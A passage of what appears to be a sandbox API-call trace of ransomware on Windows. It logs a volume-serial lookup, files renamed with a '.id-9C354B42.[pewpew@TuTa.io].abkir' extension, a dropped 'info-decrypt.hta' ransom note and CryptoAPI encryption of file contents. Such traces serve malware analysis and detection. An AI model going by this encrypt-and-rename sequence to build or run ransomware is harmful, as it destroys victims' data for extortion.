lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0150.799] WbemDefPath:IWbemPath:GetText (in: This=0x60253e0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0150.799] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36ca2c0*=0, plFlavor=0x36ca2c4*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36ca2c0*=8, plFlavor=0x36ca2c4*=0) returned 0x0 [0150.799] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.799] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.799] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36ca2c0*=8, plFlavor=0x36ca2c4*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36ca2c0*=8, plFlavor=0x36ca2c4*=0) returned 0x0 [0150.799] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.799] SysStringByteLen (bstr="9C354B42") returned 0x10 [0150.799] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi", lpFilePart=0x0) returned 0x4b [0150.799] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6e [0150.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0150.799] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x16b78fa0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0150.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0150.800] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0150.800] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0150.800] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0150.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0150.801] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd320fa0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xd320fa0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xd36d260, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0150.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0150.801] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0150.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0150.801] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x36ca950 | out: lpFileInformation=0x36ca950*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0150.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0150.801] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0150.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0150.801] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0150.802] GetFileType (hFile=0x2f0) returned 0x1 [0150.802] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f434) returned 1 [0150.802] GetFileType (hFile=0x2f0) returned 0x1 [0150.802] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6c0f540 | out: lpFileSizeHigh=0x6c0f540*=0x0) returned 0x61d [0150.802] ReadFile (in: hFile=0x2f0, lpBuffer=0x36cb1a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6c0f4ec, lpOverlapped=0x0 | out: lpBuffer=0x36cb1a4*, lpNumberOfBytesRead=0x6c0f4ec*=0x61d, lpOverlapped=0x0) returned 1 [0150.804] CloseHandle (hObject=0x2f0) returned 1 [0150.804] CryptAcquireContextW (in: phProv=0x6c0f48c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c0f48c*=0xbdf948) returned 1 [0150.805] CryptGenRandom (in: hProv=0xbdf948, dwLen=0x10, pbBuffer=0x36cc868 | out: pbBuffer=0x36cc868) returned 1 [0151.115] CryptImportKey (in: hProv=0xbdf948, pbData=0x39fa8fc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6c0f45c | out: phKey=0x6c0f45c*=0xb7fd50) returned 1 [0151.116] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.116] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.116] CryptDuplicateKey (in: hKey=0xb7fd50, pdwReserved=0x0, dwFlags=0x0, phKey=0x6c0f44c | out: phKey=0x6c0f44c*=0xbe1468) returned 1 [0151.116] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.116] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x4, pbData=0x39fa9dc*=0x1, dwFlags=0x0) returned 1 [0151.116] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x1, pbData=0x39fa9a8, dwFlags=0x0) returned 1 [0151.116] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39fa9ec*, pdwDataLen=0x6c0f4b8*=0x620, dwBufLen=0x620 | out: pbData=0x39fa9ec*, pdwDataLen=0x6c0f4b8*=0x620) returned 1 [0151.116] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x39fb030*, pdwDataLen=0x6c0f4c0*=0x0, dwBufLen=0x10 | out: pbData=0x39fb030*, pdwDataLen=0x6c0f4c0*=0x10) returned 1 [0151.117] CryptDestroyKey (hKey=0xb7fd50) returned 1 [0151.117] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0151.117] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0151.117] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", nBufferLength=0x105, lpBuffer=0x6c0ef30, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml", lpFilePart=0x0) returned 0x4b [0151.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f424) returned 1 [0151.117] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0151.118] GetFileType (hFile=0x31c) returned 0x1 [0151.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f420) returned 1 [0151.118] GetFileType (hFile=0x31c) returned 0x1 [0151.118] WriteFile (in: hFile=0x31c, lpBuffer=0x39fb660*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6c0f4b4, lpOverlapped=0x0 | out: lpBuffer=0x39fb660*, lpNumberOfBytesWritten=0x6c0f4b4*=0x20, lpOverlapped=0x0) returned 1 [0151.118] CloseHandle (hObject=0x31c) returned 1 [0151.119] CoTaskMemAlloc (cb=0x20c) returned 0xbe7d48 [0151.119] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbe7d48 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0151.321] CoTaskMemFree (pv=0xbe7d48) [0151.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6c0ef18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.322] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f460 | out: ppv=0x6c0f460*=0xb51e34) returned 0x0 [0151.322] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f458 | out: pAptType=0x6c0f458*=1) returned 0x0 [0151.322] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0151.322] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.322] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x6024ad0) returned 0x0 [0151.322] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024ad0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0151.323] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024ad0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6025bc0) returned 0x0 [0151.323] WbemDefPath:IUnknown:Release (This=0x6024ad0) returned 0x0 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6025bc0) returned 0x0 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0151.323] WbemDefPath:IUnknown:AddRef (This=0x6025bc0) returned 0x3 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0x66ccb38) returned 0x0 [0151.323] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.323] WbemDefPath:IUnknown:Release (This=0x66ccb38) returned 0x3 [0151.323] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0151.323] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0151.323] WbemDefPath:IUnknown:Release (This=0x6025bc0) returned 0x2 [0151.323] WbemDefPath:IUnknown:Release (This=0x6025bc0) returned 0x1 [0151.323] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0151.323] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0151.323] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025bc0, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6025bc0) returned 0x0 [0151.323] WbemDefPath:IUnknown:AddRef (This=0x6025bc0) returned 0x3 [0151.323] WbemDefPath:IUnknown:Release (This=0x6025bc0) returned 0x2 [0151.323] WbemDefPath:IWbemPath:SetText (This=0x6025bc0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.323] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025bc0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0151.323] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetText (in: This=0x6025bc0, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025bc0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025bc0, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025bc0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetInfo (in: This=0x6025bc0, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025bc0, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0151.324] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.324] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0151.324] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0151.324] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0151.324] IUnknown:Release (This=0xb51e34) returned 0x1 [0151.325] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6024af0) returned 0x0 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024af0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0151.325] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024af0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x6025c30) returned 0x0 [0151.325] WbemDefPath:IUnknown:Release (This=0x6024af0) returned 0x0 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x6025c30) returned 0x0 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0151.325] WbemDefPath:IUnknown:AddRef (This=0x6025c30) returned 0x3 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ccb58) returned 0x0 [0151.325] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb58, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.325] WbemDefPath:IUnknown:Release (This=0x66ccb58) returned 0x3 [0151.325] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0151.325] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0151.325] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0151.325] WbemDefPath:IUnknown:Release (This=0x6025c30) returned 0x2 [0151.326] WbemDefPath:IUnknown:Release (This=0x6025c30) returned 0x1 [0151.326] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0151.326] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0151.326] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025c30, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x6025c30) returned 0x0 [0151.326] WbemDefPath:IUnknown:AddRef (This=0x6025c30) returned 0x3 [0151.326] WbemDefPath:IUnknown:Release (This=0x6025c30) returned 0x2 [0151.326] WbemDefPath:IWbemPath:SetText (This=0x6025c30, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0151.326] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025c30, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0151.326] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0151.326] WbemDefPath:IWbemPath:GetText (in: This=0x6025c30, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.326] CoGetObjectContext 